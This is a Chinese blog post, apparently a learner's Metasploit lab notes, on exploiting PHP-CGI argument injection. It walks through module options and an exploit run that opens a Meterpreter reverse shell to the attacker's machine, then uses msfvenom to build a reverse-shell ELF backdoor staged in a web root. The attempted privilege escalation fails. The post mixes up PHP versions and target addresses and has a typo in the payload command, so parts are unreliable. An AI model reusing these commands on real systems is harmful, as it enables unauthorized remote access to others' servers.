利用Metasploit对PHP5.2.4渗透测试提权

最新推荐文章于 2023-12-04 19:19:53 发布

我重来不说话

最新推荐文章于 2023-12-04 19:19:53 发布

阅读量1.6k

点赞数 1

分类专栏：精通Metasploit学习笔记文章标签： metasploit php5 渗透测试 kali linux

本文链接：https://blog.csdn.net/qq_19623861/article/details/116463727

版权

精通Metasploit学习笔记专栏收录该内容

41 篇文章 31 订阅

订阅专栏

文章目录

前言
一、启动metasploit数据库
二、PHP5.2.4渗透测试
- 1.设置相关渗透模块
- 2.提权
总结

前言

针对PHP5.2.4进行渗透测试提权

一、启动metasploit数据库

启动metasploit在上一篇文章已经详细介绍

利用db_nmap扫描到的结果，在进行services -u 过滤结果

msf6 > services -u
Services
========
host           port  proto  name           state  info
----           ----  -----  ----           -----  ----
192.168.1.115  80    tcp    http           open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
192.168.1.115  81    tcp    http           open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
msf6 >

二、PHP5.2.4渗透测试

1.设置相关渗透模块

use exploit/multi/http/php_cgi_arg_injection
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > options

Module options (exploit/multi/http/php_cgi_arg_injection):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLESK        false            yes       Exploit Plesk
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.105    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:
                                           <path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
   URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/http/php_cgi_arg_injection) > setg lport 4567
lport => 4567
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4567
[*] Sending stage (39282 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.113:4567 -> 192.168.1.105:43816) at 2021-05-06 21:44:40 +0800

meterpreter > lls

2.提权

因为现在是php meterpreter 权限，有些操作不能完成

meterpreter > arp
[-] The "arp" command is not supported by this Meterpreter type (php/php)

生成攻击载荷

┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lprotE=4568 -f elf >php_backdoor.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes                                                                                                                
┌──(root💀kali)-[~]
└─# mv php_backdoor.elf ../var/www/html

但在被控端的meterpreter权限中，无法使用wget等命令，所以没有完成提权，如果你成功了，希望你可以分享于本文不同的做法

meterpreter > pwd
[-] The "pwd" command is not supported by this Meterpreter type (php/php)
meterpreter >

总结

本文简单介绍了php 5.2.4后门漏洞的渗透攻击以及提权，本人也在学习当中，仅供参考，作为学习笔记使用，欢迎一起讨论。

我重来不说话

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
2
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录